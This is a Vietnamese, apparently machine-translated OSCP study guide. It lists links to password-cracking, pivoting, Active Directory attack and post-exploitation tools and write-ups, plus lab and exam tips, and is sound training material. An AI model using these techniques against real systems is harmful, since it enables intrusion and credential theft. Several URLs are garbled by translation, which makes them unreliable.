Một điều mà tôi sẽ đề cập là nếu bạn muốn thực hiện leo thang đặc quyền Linux của mình, tôi thực sự khuyên bạn nên xem hộp dễ bị tấn công Lin.Security được tạo bởi in.security! Hộp được thiết kế để giúp mọi người hiểu cách một số ứng dụng và dịch vụ được định cấu hình sai có thể dễ dàng bị kẻ tấn công lạm dụng. Hộp này thực sự đã giúp tôi cải thiện kỹ năng và kỹ thuật leo thang đặc quyền của mình trên hệ thống Linux.
- Liên kết chính: https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/
- Sao lưu: https://www.vulnhub.com/entry/linsecurity-1,244/
Phần 16: Bẻ khóa mật khẩu
Trong phần này, bạn cần hiểu những kiến thức cơ bản về các cuộc tấn công bằng mật khẩu. Xác định sự khác biệt giữa băm Windows (NTLM) và băm Linux. Ngoài ra, bạn cũng sẽ cần phải hiểu các công cụ khác nhau mà bạn có thể sử dụng để tiến hành các cuộc tấn công mật khẩu trực tuyến và ngoại tuyến. Thông thường, bẻ khóa mật khẩu trực tuyến liên quan đến việc gửi các nỗ lực đến dịch vụ xác thực; như một biểu mẫu web hoặc dịch vụ đầu cuối. Trong các cuộc tấn công ngoại tuyến, bạn sẽ thực hiện bẻ khóa cục bộ, như sử dụng John The Ripper để bẻ khóa tệp zip trên máy cục bộ của bạn. Dưới đây là danh sách các tài nguyên mà tôi đã sử dụng để giúp tôi hiểu rõ hơn về cách hoạt động của việc bẻ khóa mật khẩu:
Giới thiệu về bẻ khóa mật khẩu: https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf
Công cụ ngoại tuyến để bẻ khóa mật khẩu:
- Hashcat: https://hashcat.net/hashcat/ Các mẫu băm để kiểm tra với Hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes
- John the Ripper: https://www.openwall.com/john/
- Metasploit Unleashed sử dụng John the Ripper với Hashdump: https://www.offensive-security.com/metasploit-unleashed/john-ripper/
Công cụ trực tuyến để bẻ khóa mật khẩu:
- THC Hydra: https://github.com/vanhauser-thc/thc-hydra
- Crowbar: https://github.com/galkan/crowbar
Trình tạo danh sách từ:
- Cewl: https://digi.ninja/projects/cewl.php
- Crunch: https://tools.kali.org/password-attacks/crunch
- Cupp (Trong Kali Linux): https://github.com/Mebus/cupp
Các công cụ để kiểm tra kiểu băm:
Mã định danh băm: https://github.com/psypanda/hashID
Các công cụ để kết xuất hàm băm:
Mimikatz: https://github.com/gentilkiwi/mimikatz
Mimipenguin: https://github.com/huntergregal/mimipenguin
Pypykatz: https://github.com/skelsec/pypykatz
Danh sách các từ:
- Trong Kali: / usr / share / wordlists
- Danh sách bảo mật: apt-get install seclists Bạn có thể tìm thấy tất cả danh sách mật khẩu của anh ấy tại đây: https://github.com/danielmiessler/SecLists/tree/master/Passwords
Danh sách từ vựng Xajkep: https://github.com/xajkep/wordlists
Trình bẻ khóa mật khẩu trực tuyến:
Thật khó hiểu, đây cũng là những phần mềm bẻ khóa trực tuyến nhưng đây là bộ sưu tập các hàm băm đã được bẻ trước (ví dụ: danh sách từ đã được băm) hoặc các dịch vụ máy tính mà bạn có thể sử dụng để phá các hàm băm. Tôi thường đi tìm những thứ này đầu tiên để xem liệu chúng có bị bẻ khóa băm trong cơ sở dữ liệu của chúng hay không. Tuy nhiên, đừng sử dụng những cracker trực tuyến này làm công cụ chính của bạn cho mọi thứ. Tải lên một băm từ một lần tương tác có thể là một rủi ro lớn, vì vậy hãy đảm bảo bạn sử dụng các công cụ ngoại tuyến của mình để bẻ khóa các loại băm đó. Đây là danh sách các trình bẻ khóa băm trực tuyến mà tôi tìm thấy trên mạng mà bạn có thể sử dụng để bẻ khóa băm:
- https://hashkiller.io/
- https://www.cmd5.org/
- https://www.onlinehashcrack.com/
- https://gpuhash.me/
- https://crackstation.net/
- https://passwordrecovery.io/
- https://md5decrypt.net/en/
- https://hashes.com/en/decrypt/hash
- http://cracker.offensive-security.com/
Các tài nguyên khác để bẻ khóa mật khẩu:
- Pwning Mật khẩu WordPress: https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956
Phần 17: Chuyển hướng cổng và xoay vòng
Tùy thuộc vào phạm vi của bạn, một số máy có thể không truy cập trực tiếp được. Có những hệ thống ngoài đó được hỗ trợ kép, cho phép bạn kết nối vào một mạng nội bộ. Bạn sẽ cần biết một số kỹ thuật sau để có được quyền truy cập vào các mạng không công cộng:
- Abatchy’s Port Forwarding Guide: https://www.abatchy.com/2017/01/port-ionarying-practical-hands-on-guide
- Chuyển tiếp cổng Windows: http://woshub.com/port-osysteming-in-windows/
- Giải thích về SSH Tunneling: https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
- Tìm hiểu đường hầm proxy: https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
- Tìm hiểu về chuyển tiếp cổng với Metasploit: https://www.offensive-security.com/metasploit-unleashed/portfwd/
- Khám phá mạng ẩn với tính năng quay vòng kép: https://pentest.blog/explore-hiested-networks-with-double-pivoting/
- Nội dung hack 0xdf. Pivoting và Tunneling: https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
Các công cụ giúp bạn chuyển tiếp cổng và xoay vòng:
- Proxychains: https://github.com/haad/proxychains
- Proxychains-ng: https://github.com/rofl0r/proxychains-ng
- SSHuttle (Hoàn toàn khuyên bạn nên học cái này): https://github.com/sshuttle/sshuttle
- Tài liệu SSHuttle: https://sshuttle.readthedocs.io/en/stable/
- Chisel https://github.com/jpillora/chisel
- Ligolo: https://github.com/sysdream/ligolo
Dịch vụ đào hầm trực tuyến:
- Ngrok: https://ngrok.com/
- Twilo: https://www.twilio.com/
Các hệ thống dễ bị tổn thương để thực hành xoay:
- Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/
Phần 18: Các cuộc tấn công Active Directory:
Đây là một phần mới mà tôi thực sự mong đợi được tìm hiểu khi bản cập nhật mới được phát hành! Active Directory là một dịch vụ phổ biến mà chúng ta thấy đang chạy trong thế giới thực vì nó giúp quản trị viên hệ thống quản lý hệ thống, người dùng, dịch vụ của họ, v.v. tùy thuộc vào quy mô tổ chức của họ.
Dịch vụ miền Active Directory có thể được cài đặt trên Windows Server (2000-2019). Tôi thực sự khuyến khích bạn dành chút thời gian để tìm hiểu cách cài đặt Active Directory trên Windows Server (phiên bản bạn thích). Điều này cũng sẽ giúp bạn hiểu cách thiết lập Môi trường Active Directory của riêng bạn.
- Các nguyên tắc cơ bản về Active Directory: https://www.youtube.com/watch?v=GfqsFtmJQg0&feature=emb_logo
Tôi đã cung cấp một số tài nguyên để giúp bạn bắt đầu:
Thiết lập Active Directory:
Lưu ý: Đảm bảo rằng khi bạn đang thiết lập Máy chủ Active Directory, bạn chỉ định một địa chỉ IP tĩnh cho nó và cả một máy trạm mà bạn sẽ tham gia vào máy chủ để kiểm tra thêm. Tôi khuyên bạn nên thiết lập Máy trạm Windows 10 nếu bạn định sử dụng Windows Server 2016/2019.
- Tài liệu Microsoft để cài đặt Active Directory: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/deploy/install-active-directory-domain-services–level-100-
- Cài đặt Windows Active Directory trên Windows Server 2019: https://computingforgeeks.com/how-to-install-active-directory-domain-services-in-windows-server/
- Tìm hiểu tài khoản người dùng trong Active Directory: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts
- Ba cách để tạo Người dùng Active Directory: https://petri.com/3-ways-to-create-new-active-directory-users
- Tham gia một máy trạm vào miền: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/join-a-computer-to-a-domain
Các công cụ giúp bạn tự động cài đặt Active Directory:
- ADLab: https://github.com/browninfosecguy/ADLab
- Phòng thí nghiệm tự động: https://github.com/AutomatedLab/AutomatedLab
- MSLab: https://github.com/microsoft/MSLab
- Invoke-ADLabDeployer: https://github.com/outflanknl/Invoke-ADLabDeployer
- Thiết lập người dùng Active Directory: https://github.com/bjiusc/Active-Directory-User-Setup-Script
Liệt kê Active Directory:
- Liệt kê Active Directory với Powershell: https://www.exploit-db.com/docs/english/46990-active-directory-enumeration-with-powershell.pdf
- Bảng lừa đảo khai thác Active Directory: https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#domain-enumeration
- Powersploit: https://github.com/PowerShellMafia/PowerSploit
Hiểu các giao thức xác thực mà Active Directory sử dụng:
- Xác thực NTLM: https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview
- Xác thực Kerberos https://docs.microsoft.com/en-us/windows-server/security/kerberos/kerberos-authentication-overview
- Bộ nhớ cache và thông tin đăng nhập được lưu trữ: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)
- Tài khoản dịch vụ được quản lý theo nhóm: https://adsecurity.org/?p=4367
Chuyển động bên trong Active Directory:
- Mở đường đến DA: https://blog.zsec.uk/path2da-pt1
- Vượt qua Hash với tài khoản máy: https://www.ntic.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts
- Vượt qua hàm băm (Tải trọng tất cả mọi thứ): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#overpass-the-hash-pass-the- Chìa khóa
- Red Team Adventures Overpass the Hash: https://riccardoancarani.github.io/2019-10-04-media-movement-megaprimer/#overpass-the-hash
- Pass the Ticket (Silver Tickets): https://adsecurity.org/?p=2011
- Chuyển động bên với DCOM: https://www.osystem.team/offensive-security/ cạnh-movement/t1175-distributed-component-object-model
Tính bền bỉ của Active Directory:
- Bẻ khóa vé Kerberos TGS bằng cách sử dụng Kerberoast: https://adsecurity.org/?p=2293
- Kerberoasting Without Mimikatz: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
- Vé vàng: https://www.ntic.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets
- Pass the Ticket (Golden Tickets): https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#pass-the-ticket-golden-tickets
- Tìm hiểu các cuộc tấn công DCSync: https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync
Các công cụ để di chuyển và duy trì trong Active Directory:
- ADRecon: https://github.com/sense-of-security/ADRecon
- Kerbrute: https://github.com/ropnop/kerbrute
- Rubeus: https://github.com/GhostPack/Rubeus
- Impacket: https://github.com/SecureAuthCorp/impacket
Các nguồn lực khác:
- Xây dựng Active Directory với PowerShell: https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/
- Chuyển động bên cho AD: https://riccardoancarani.github.io/2019-10-04-media-movement-megaprimer/#overpass-the-hash
- Chuyển động bên với CrackMapExec: https://www.hackingarticles.in/media-moment-on-active-directory-crackmapexec/
Phần 19: Khung Metasploit
Hướng dẫn duy nhất mà tôi sử dụng để tìm hiểu thêm về Metasploit là khóa học Mở rộng Metasploit An ninh Tấn công… miễn phí! https://www.offensive-security.com/metasploit-unleashed/

Các tài nguyên khác: Metasploit The Penetration Tester’s Guide (Một cuốn sách siêu hay để đọc): https://nostarch.com/metasploit
Tài liệu Metasploit: https://docs.rapid7.com/metasploit/getting-started/
Msfvenom Cheat Sheets:
- http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/
- https://netsec.ws/?p=331
- https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
Phần 20: Đế chế Powershell:
PowerShell Empire là một khuôn khổ sau khai thác bao gồm một tác nhân Windows thuần PowerShell tương thích với các tác nhân Linux / OS X Python 3.x. Nó là sự hợp nhất của các dự án PowerShell Empire và Python EmPyre trước đây. Gần đây, nhóm Kali Linux đang hợp tác với BC Security để tài trợ cho PowerShell Empire. Sự tài trợ này cung cấp cho người dùng Kali quyền truy cập sớm độc quyền trong 30 ngày vào Empire và Starkiller trước khi các bản cập nhật được phát hành công khai vào kho lưu trữ chính thức.
Ban đầu được tạo bởi harmj0y, sixdub và enigma0x3. Vào ngày 31 tháng 7 năm 2019, dự án không còn được hỗ trợ nữa và nhóm tại BC Security hiện đang duy trì bản fork tích cực nhất của Empire https://github.com/BC-SECURITY/Empire .
Khóa học giải thích rất tốt cách sử dụng công cụ và cách bạn có thể sử dụng nó. Dưới đây là một số tài nguyên mà bạn có thể xem xét để hiểu cách hoạt động của Đế chế PowerShell:
- Cài đặt PowerShell Empire: https://github.com/BC-SECURITY/Empire/wiki/Installation
- Sử dụng PowerShell Empire: https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/
Các nguồn lực khác:
- Starkiller: https://github.com/BC-SECURITY/Starkiller
- Empire Cli: https://github.com/BC-SECURITY/Empire-Cli
- Hồ sơ C2 dễ uốn cho Empire: https://github.com/BC-SECURITY/Malleable-C2-Profiles
Tài nguyên bổ sung
Điều này kết luận rằng các tài nguyên tôi đã sử dụng đã giúp tôi hiểu được đề cương của khóa học. Bây giờ tôi sẽ chia sẻ với bạn một số mẹo và tài nguyên bổ sung mà tôi đã sử dụng để chuẩn bị cho PEN200 PWK / OSCP.
Thiết lập Môi trường Pentesting của bạn:
Khóa học khuyến nghị bạn đang sử dụng các sản phẩm VMware để chạy hình ảnh Kali Linux tùy chỉnh mà họ đã tạo. Người dùng Windows có thể mua VMware Workstation hoặc sử dụng chương trình miễn phí VMware Player . Đối với Người dùng MAC, bạn sẽ cần sử dụng VMware Fusion . Nếu bạn muốn tải xuống Hệ thống Kali Linux tùy chỉnh cho PWK, bạn có thể tìm thấy nó tại đây:
Hãy nhớ rằng các máy ảo được lưu trữ trên Offensive Security được Nhóm Kali Linux cập nhật. PWK mới không yêu cầu bạn sử dụng hệ thống Kali tùy chỉnh mà họ đã tạo. Bạn có thể sử dụng phiên bản mới nhất mà nhóm Kali Linux duy trì để hoàn thành các bài tập trong phòng thí nghiệm / khóa học.
Một máy ảo khác mà tôi đã tạo là hệ thống Windows 7 32-bit để tạo ra bất kỳ ứng dụng dễ bị tấn công nào mà tôi cần gỡ lỗi hoặc để kiểm tra xem tôi có thể lấy được trình bao từ chúng hay không. Bạn cũng có thể tạo hệ thống Windows 7 64-bit nhưng một số ứng dụng 32-bit có thể không hoạt động bình thường như trên hệ thống 32-bit thực tế. Phương pháp này rất hữu ích để thực hiện trong trường hợp bạn bị kẹt trên hệ thống cửa sổ đang chạy một dịch vụ mà vì lý do nào đó bạn không thể lấy được trình bao.
Để chuẩn bị cho Active Directory, tôi đã tạo Windows Server 2019 và máy ảo Windows 10 Pro để tham gia vào môi trường AD mà tôi đã tạo. Có một số hướng dẫn tốt về cách thiết lập môi trường AD trong phòng thí nghiệm của riêng bạn:
Nếu bạn quan tâm đến việc mở rộng môi trường sống của mình và tự hỏi làm thế nào bạn có thể làm điều đó, tôi đã viết một hướng dẫn để giúp bạn bắt đầu xây dựng trang trại gia đình của riêng mình:
Wargames / Thử thách thực hành:
Tôi biết tôi đã nêu luận điểm trước đây nhưng tôi sẽ nhắc lại điều này:
OverTheWire Bandit: Một tập hợp các thử thách thú vị dành cho Linux để bạn làm quen với bash và Linux. Hướng dẫn của Abatchys thực sự đã giúp tôi ở đây:
- Bandit 1-5: https://www.abatchy.com/2016/10/overthewire-bandit-0-5
- Bandit 6-10: https://www.abatchy.com/2016/10/overthewire-bandit-6-10
- Bandit 11-15: https://www.abatchy.com/2016/10/overthewire-bandit-11-15
- Bandit 16-20: https://www.abatchy.com/2016/10/overthewire-bandit-16-20
- Bandit 21-26: https://www.abatchy.com/2016/10/overthewire-bandit-21-24
OverTheWire Natas: Một tập hợp các thử thách ứng dụng web đơn giản. Những thách thức này sẽ giúp bạn hiểu những điều cơ bản cần thiết để xác định các vấn đề trong ứng dụng web. Xem hướng dẫn này tại đây: https://infamoussyn.wordpress.com/2014/02/05/overthewire-natas-level-0-16-writeup-updated/
UndertheWire: Có lẽ là nơi yêu thích của tôi cho các thử thách vì chúng chứa một loạt các thử thách PowerShell rất lớn. Bạn có thể tìm thấy những thách thức của họ tại đây: http://www.underthewire.tech/wargames.htm
Root-me.org Một nơi rộng lớn có những thách thức đối với hầu hết mọi thứ trong an ninh mạng. Ví dụ, bạn sẽ thấy những thách thức trong các lĩnh vực sau:
- Kiểm tra mạng (Phân tích gói tin, Lưu lượng được thu thập, Dịch vụ mạng)
- Lập trình (C, PHP, Java, Shell-coding)
- Kỹ thuật đảo ngược (tháo rời các ứng dụng)
- Ứng dụng Web và Thách thức của Khách hàng.
- Những thách thức pháp y.
Hãy dành một vài phút để xem qua một số trong số này!
SANS Holiday Hack Challenges: https://www.holidayhackchallenge.com/past-challenges/
Nắm bắt các Cuộc thi CTF / Cuộc thi Trực tuyến:
Tôi biết một số bạn đang đọc điều này có thể nghi ngờ tại sao tôi lại thêm điều này… thành thật mà nói, nghề nghiệp an ninh mạng mà chúng ta đang làm không phải là một công việc bình thường từ 7 giờ sáng đến 3 giờ chiều… đó là một lối sống. Tôi hiểu rằng đối với nhiều người trong chúng ta, thật khó để dành thời gian để làm tất cả những việc trong lĩnh vực này và điều đó hoàn toàn ổn! Nếu bạn có thời gian hoặc nếu bạn đã có thể, hãy sắp xếp thời gian ra khỏi lịch trình bận rộn của bạn để thực hiện CTF. Hãy tiếp tục và hack tất cả những thứ mà nhiều CTF này cung cấp như một thách thức. Hãy tin tôi, bạn sẽ học được một số điều thú vị trong một CTF mà thậm chí không một lớp học nào có thể dạy bạn. Cá nhân tôi, việc thi đấu trong các CTF đã giúp ích cho tôi trong khóa học này và nó cũng giúp tôi hiểu rõ hơn về những thứ tôi nên tìm kiếm thay vì nhảy vào hố thỏ!
Cũng đừng sợ cạnh tranh trong một CTF nếu đây là lần đầu tiên của bạn! Mọi người đều phải bắt đầu một nơi nào đó trong cuộc hành trình của họ, bạn chỉ cần tiếp tục thúc đẩy về phía trước. Vì vậy, hãy ra ngoài đó và tìm một số CTF cho dù họ ở địa phương với bạn hay trực tuyến, hãy dành chút thời gian và tự tin khi thực hiện chúng.
Nếu bạn không thể tìm thấy bất kỳ CTF địa phương nào, hãy xem CTFTime cho các cuộc thi trực tuyến mà bạn có thể tham gia. Rất nhiều cuộc thi trên mạng trong vài năm qua đã thực sự giúp tôi xây dựng kỹ năng của mình và tôi vẫn đi ra ngoài một lần để tìm CTF để cạnh tranh vào cho vui 😊. Bạn cũng có thể tìm thấy CTF mà Offsec tài trợ, nơi bạn có thể giành được phiếu thưởng PWK!
Máy dễ bị tổn thương:
Boot-to-Root Máy dễ bị tổn thương! Những cỗ máy này rất tuyệt vời để giúp bạn xây dựng kỹ năng của mình để dồn nén. Có những nơi bạn có thể tải chúng xuống và chạy chúng trên hệ thống của mình để bắt đầu luyện tập hoặc những nơi mà bạn có thể kết nối với phạm vi của chúng và bắt đầu tấn công các mục tiêu mà chúng có. Cuối cùng, hầu hết chúng đều dẫn đến việc có được quyền truy cập cấp root hoặc cấp Quản trị / Hệ thống. Cá nhân tôi, ba địa điểm yêu thích của tôi là Proving Grounds, Hackthebox và Vulnhub.
Hãy nhớ rằng các hộp mà bạn đánh giá trên các nền tảng này nên được sử dụng như một cách để bắt đầu, để xây dựng kỹ năng thực tế của bạn hoặc khắc phục bất kỳ điểm yếu nào mà bạn có thể có trong phương pháp áp dụng của mình.
Khi bạn cảm thấy thoải mái khi tham gia khóa học, bạn nên cố gắng xem qua mọi hệ thống trong môi trường phòng thí nghiệm PWK / OSCP, vì chúng sẽ cung cấp cái nhìn sâu sắc hơn về thời điểm bạn cố gắng làm bài thi.
Cơ sở chứng minh (Lab Online) :
Offensive Security đã phát hành môi trường phòng thí nghiệm riêng của họ, nơi bạn có thể thực hành các kỹ năng tốt nhất của mình với các hộp mà họ cung cấp trực tuyến. Nền tảng cung cấp hai cấp PG Play và PG Practice. PG Play làm cho các hộp từ Vulnhub trở nên sống động và cung cấp quyền truy cập chuyên dụng bằng cách kết nối với môi trường của họ thông qua VPN hoặc bạn có thể sử dụng hệ thống trình duyệt Kali Linux cơ bản. Hãy nhớ rằng PG Play chỉ cho phép bạn ba giờ mỗi ngày để đánh giá hệ thống trong môi trường Play. Họ cũng chỉ cung cấp các hộp Linux nhưng điều này có thể thay đổi trong tương lai.
PG Practice bao gồm tất cả các tính năng và loại bỏ giới hạn thời gian ba giờ nhưng Practice cũng cung cấp các hộp Linux và Windows mà bạn có thể sử dụng để cải thiện kỹ năng dồn nén của mình vì các hộp này được tạo bởi các Chuyên gia Offsec. Một số hệ thống mà bạn có thể nhận thấy là máy thi Offsec cũ mà bạn có thể đánh giá để nâng cao kỹ năng hack của mình.
Với sự chấp thuận từ Offsec, tôi đã tạo một danh sách các hộp mà tôi đã xem qua mà tôi tin rằng đó là OSCP Like. Bạn có thể tìm thấy danh sách ở đây và kiểm tra các bản cập nhật mà tôi sẽ thêm vào danh sách trong tương lai:
HackTheBox :
Nền tảng kiểm tra thâm nhập trực tuyến chứa nhiều loại máy để giúp bạn cải thiện kỹ năng kiểm tra thâm nhập của mình. Đối với những người chưa đăng ký, bạn sẽ cần phải vượt qua một thử thách để tạo cho mình một mã kích hoạt. Khi bạn đã tạo mã kích hoạt của mình, bạn sẽ có khả năng truy cập vào phạm vi của chúng. Ở hạng miễn phí, bạn được phép chơi với 20 máy đang hoạt động mà họ có và họ quay vòng một hệ thống mới trong phạm vi hàng tuần và gỡ bỏ một hệ thống cũ ở đó. Nếu bạn muốn truy cập vào các máy đã nghỉ hưu của họ, bạn sẽ phải có quyền truy cập VIP. Theo ý kiến của tôi, đó là một mức giá rất hợp lý và đáng để đầu tư. Nếu bạn không có tiền để đầu tư vào Hackthebox, đừng lo lắng vì bạn chắc chắn có thể tìm thấy những hướng dẫn này trực tuyến (sau khi các hộp đã ngừng hoạt động). Một nơi tôi chắc chắn muốn giới thiệu là Hướng dẫn IppSec Hackthebox trên YouTube! Tôi thích xem video của anh ấy vì anh ấy hướng dẫn từng bước về cách có được quyền truy cập vào mục tiêu và cách báo cáo các đặc quyền của bạn để có được quyền truy cập root. Mỗi hộp có một kịch bản khác nhau và IppSec luôn có thêm thứ gì đó để ném vào khi anh ta thực hiện hướng dẫn của mình.
Với điều đó đã được nói, tôi đã tạo một danh sách tất cả các hộp mà tôi đã làm trong Hackthebox mà tôi nghĩ là OSCP Like. Bạn có thể tìm thấy chúng ở đây và cũng có thể xem danh sách phát IppSec mà anh ấy đã tạo từ danh sách mà tôi đã đề xuất để bắt đầu xem!
Tôi sẽ tiếp tục cập nhật danh sách này trong tương lai và nếu bạn muốn giữ nó, bạn có thể tìm thấy nó ở đây và trên NetSecFocus: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid= 1839402159
Hộp HTB chuẩn bị cho OSCP (Danh sách phát trên Youtube): https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf
Ippsec Rocks: https://ippsec.rocks/?#
Vulnhub :
Cũng giống như Hackthebox, ngoại trừ việc bạn phải tải xuống các máy dễ bị tấn công và chạy chúng trên hệ thống cục bộ của mình. Bạn sẽ cần VMware hoặc VirtualBox (tôi khuyên bạn nên sử dụng máy trạm VMware) để chạy các hệ thống dễ bị tấn công này. Hãy đảm bảo rằng bạn đang chạy các hệ thống dễ bị tấn công này trên một mạng bị cô lập chứ không phải trên mạng công cộng.
Cảm ơn g0tmi1k và nhóm của anh ấy đã lưu trữ trang web này và những người sáng tạo gửi các máy dễ bị tấn công này. Tôi cũng đã tạo một danh sách các máy vulnhub mà tôi nhận thấy là OSCP-Like. Bạn có thể tìm thấy chúng ở đây và trên NetSecFocus:
Tôi sẽ tiếp tục cập nhật danh sách này và nếu bạn muốn một bản sao để xem lại, bạn chắc chắn có thể tìm thấy nó ở đây: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0
Việc root máy dễ bị tổn thương là cực kỳ quan trọng khi bạn chuẩn bị cho PWK / OSCP vì bạn không thể phụ thuộc vào kiến thức lý thuyết để vượt qua. Cải thiện kỹ năng thực hành của bạn sẽ đóng một vai trò quan trọng rất lớn khi bạn xử lý những cỗ máy này.
Mẹo để tham gia kỳ thi OSCP được Proctored:
Kể từ ngày 15 tháng 8 năm 2018, tất cả các kỳ thi OSCP đều có bài kiểm tra giám sát. Điều này có nghĩa là một học sinh sẽ được giám sát bởi một nhân viên An ninh Tấn công thông qua dịch vụ chia sẻ màn hình và webcam. Nếu bạn muốn tìm hiểu thêm về quy trình mới này, bạn có thể tìm thấy nó tại đây: https://www.offensive-security.com/offsec/proctoring/ Trước khi làm bài kiểm tra, tôi đã phải trải qua nhiều thứ để đảm bảo rằng tôi đã chuẩn bị sẵn sàng để thực hiện lần thử đầu tiên của mình. Ngay cả với sự chuẩn bị của mình, tôi đã mất 30 phút thời gian làm bài thi thực sự của mình do cuối cùng tôi phải gỡ rối các ứng dụng cho giám thị. Như đã nói, đây là lời khuyên của tôi để giúp các bạn chuẩn bị cho phần thi tiến sĩ khi bạn sẵn sàng tham gia kỳ thi:
- Đảm bảo hệ thống của bạn có thể đáp ứng các yêu cầu phần mềm / phần cứng mà bảo mật tấn công cung cấp để chạy các dịch vụ này. Bạn có thể tìm thấy thông tin đó tại đây: https://support.offensive-security.com/proctoring-faq/
- Kiểm tra webcam của bạn để đảm bảo nó hoạt động. bạn không thể sử dụng máy tính xách tay dự phòng có webcam và kết nối phiên webcam vào hệ thống đó.
- Ứng dụng Chia sẻ màn hình cần phải chạy trên hệ thống chính mà bạn sẽ sử dụng để kết nối với bài kiểm tra của mình.
- Bạn có thể sử dụng nhiều màn hình cho kỳ thi. Hãy nhớ rằng giám thị phải có thể nhìn thấy chúng và chúng được kết nối với hệ thống của bạn. Giám thị sẽ thông báo cho bạn về số lượng màn hình mà họ nhìn thấy và bạn sẽ cần xác nhận chúng với số màn hình mà bạn đang sử dụng. Nếu bạn sử dụng một hệ thống có màn hình và nó không được kết nối với ứng dụng ScreenConnect, thì bạn sẽ không thể sử dụng màn hình đó cho kỳ thi.
- Hãy chuẩn bị và đăng nhập vào các phiên webcam và ScreenConnect của bạn 30 phút trước kỳ thi của bạn.
- Giám thị không thể cung cấp bất kỳ hỗ trợ nào trong suốt kỳ thi.
- Bạn có thể giải lao, chợp mắt hoặc uống một tách cà phê trong khi làm bài kiểm tra. Chỉ cần đảm bảo rằng bạn thông báo cho giám thị khi bạn rời đi và khi bạn quay lại bài kiểm tra của mình.
- Học sinh không được phép ghi lại màn hình của mình trong khi tương tác với bất kỳ máy thi nào.
- Cũng được mặc quần áo cho kỳ thi của bạn. Tôi nghĩ rằng điều đó khá đơn giản để hiểu tại sao.
Đối với bất kỳ câu hỏi nào khác mà bạn có thể có, bạn có thể xem Câu hỏi thường gặp về bảo mật tấn công cho các kỳ thi được kiểm duyệt tại đây: https://www.offensive-security.com/faq/
Các nguồn lực khác:
Tài nguyên Học tập NetSecFocus:
Hướng dẫn giới thiệu Offsec về OSCP: https://help.offensive-security.com/hc/en-us/articles/360059535932
Lộ trình học PWK: Một tài nguyên rất hữu ích để giúp bắt đầu những hộp bạn nên trải qua trong phòng thí nghiệm PWK. Một số hộp mà họ cung cấp cũng chứa các gợi ý cho các hộp:
Sách:
- Kali Linux được tiết lộ: https://www.kali.org/download-kali-linux-revealed-book/
- Tấn công các giao thức mạng: https://nostarch.com/networkprotocols
- Hướng dẫn sử dụng Đội Đỏ: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504
- Hash-Crack-Password-Cracking-Manual v3: https://www.amazon.com/Hash-Crack-Password-Cracking-Manual/dp/1793458618
- Sổ tay người vận hành: Đội đỏ + OSINT + Đội xanh Tham khảo: https://www.amazon.com/dp/B085RR67H5
- Loạt sách về Hacker: https://securepla.net/hacker-playbook/
- Sổ tay tin tặc ứng dụng web: http://mdsec.net/wahh/
- Tìm hiểu Windows PowerShell trong Một tháng Ăn trưa Phiên bản thứ 3 https://www.amazon.com/Learn-Windows-PowerShell-Month-Lunches/dp/1617294160
- Python bạo lực: https://www.amazon.com/Violent-Python-Cookbook-Penetration-Engineers/dp/1597499579
- Trăn mũ đen: https://nostarch.com/blackhatpython
Các khóa học có thể giúp bạn chuẩn bị cho OSCP:
eLearnSecurity / INE:
eLearnSecurity sử dụng để trở thành một nơi tuyệt vời để tìm hiểu thêm về việc áp dụng các khóa học mà họ cung cấp. Bây giờ họ thuộc sở hữu của INE, bạn phải mua đào tạo từ đó dựa trên nền tảng đăng ký để học từ tài liệu họ cung cấp để có thể đạt được chứng chỉ Elearnsecurity cung cấp.
Đào tạo An ninh mạng INE: https://ine.com/pages/cybersecurity
Chứng chỉ eLearnSecurity:
- EJPT: https://elearnsecurity.com/product/ejpt-certification/
- ECCPTv2: https://elearnsecurity.com/product/ecpptv2-certification/ (cái này có khi khó hơn OSCP nha các bạn)
TryHackMe:
Một nền tảng để giúp mọi người phát triển kỹ năng ở đó và tìm hiểu thêm về an ninh mạng. Họ có nhiều loại phòng khác nhau mà bạn có thể lựa chọn và họ làm rất tốt việc giải thích các khái niệm cơ bản trong một số phòng này. Họ cũng có các lộ trình học tập mà bạn có thể hoàn thành nhưng bạn có thể phải trả tiền cho chúng hoặc mua đăng ký để truy cập chúng.
